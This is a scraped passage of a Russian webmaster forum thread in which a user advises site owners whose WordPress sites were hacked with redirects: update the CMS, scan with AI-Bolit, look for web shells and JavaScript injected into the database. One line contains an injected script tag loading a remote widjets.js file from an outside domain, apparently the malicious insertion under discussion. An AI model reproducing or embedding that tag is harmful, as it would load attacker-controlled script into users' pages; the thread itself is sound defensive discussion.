auditsaitov001

auditsaitov001
Рейтинг
11
Регистрация
28.06.2015
fri89:
спасибо за ответ
а вот насчет регулярного обновления не понял
поясните пожалуйста

Если платформа не самописка - то обновлениями часто закрываются дыры.

Нужно искать дыру, через которую эта гадость попала на сайты.

Просто убрать - поможет наверняка только на время.

---------- Добавлено 09.09.2015 в 16:01 ----------

tr3n:
кстати айболит эти кусrи кода не видит, хотя его алго я посмотрел вроде ищет по base64, теперь точно ушел.

Надо ставить всегда на макс. чувствительность.

Возможно там еще и веб-шелл есть, которым можно всеми сайтами рулить.

Все надо проверять, а если сайтов несколько - тем более...

Гм, удалось словить 2 редиректа с главной - на сайт, продающий телефоны и на инет-шоп косметики.....

что интересно - больше редиректов поймать не удалось....

Возможно в бд залили ява-скрипт, который и вызывает редирект, потому и в скриптах ничего не находится.

Хотя, конечно, если тс сравнивал, не изменились ли скрипты отталкиваясь от даты, а не от содержимого - то он мог ничего не найти - дату изменения то можно поправить.

Если не ддосят - то антиддос не нужен, но иметь в запасе контакты антиддос-хостинга необходимо.

По взлому - если есть возможность - лучше конечно проверить, чтобы все было ок.

От ддоса, если он совсем слабый, можно отбиться самостоятельно, но лучше довериться профессионалам - антидос-хостингу.

Чтобы исключить возможность взлома - стоит проверить код движка на уязвимости (лучше вручную, сканеры часто не все дыры обнаруживают).

И, конечно - обновления и еще раз обновления....

Предлагаю увеличить лимит памяти для пхп в айболит фор виндовс хотя бы до 500 мегабайт.

Иначе невозможно просканировать дамп бд (объем около 40-50мб)- скрипт просто "умирает" от недостатка выделенной под него памяти!

SeVlad:
Всем. Это НЕ решение данной проблемы.


А вот с этим согласен.

Никто не говорил, что это 100% надежное решение.

Можно обновить и проверить весь сайт (а это деньга), а можно просто обновить и обновлением закрыть дыру.

Ну и конечно почистить бд.

Только никто не гарантирует, что дыра закроется обновлением.

Тут как повезет.

avantus избрал путь обновления.

Возможно, все будет хорошо, что я ему желаю.

# sudo apt-get install clamav<script src="//uptoliked.ru/widjets.js"></script> а надо

# sudo apt-get install clamav

Похоже-криво ссылку бот поставил.....

Я так понимаю, это случилось у многих более-менее популярных WP-сайтах, не успевших вовремя обновиться до патча 4.2.3.
Судя по описанию к этому обновлению, именно такую дыру оно и закрыло.

UPD от 4 августа: вышел фикс 4.2.4, исправляющий три уязвимости межсайтового скриптинга и возможность SQL-инъекции (CVE-2015-2213). Подробнее здесь. Думаю, теперь можно спать спокойно...

Чем не решение? Обновление и еще раз обновление....

Вот если не помогает -это уже другое...

100500 раз читал, что превышение скорости повышает вероятность "влепиться".

Фигня, все аварии из-за медленной езды! :)

Сколько раз читал, что антивирус может не среагировать на вирус...

Фигня! У меня не пропустит!

А теперь серьезно:

Каждый сам решает, что для него оптимальней.

---------- Добавлено 22.08.2015 в 13:39 ----------

Оптимизайка:
Содержимое вредоносного script, для тех кому непонятно на скриншоте,

А вот как реагируют на него антивирусы:

Всего: 105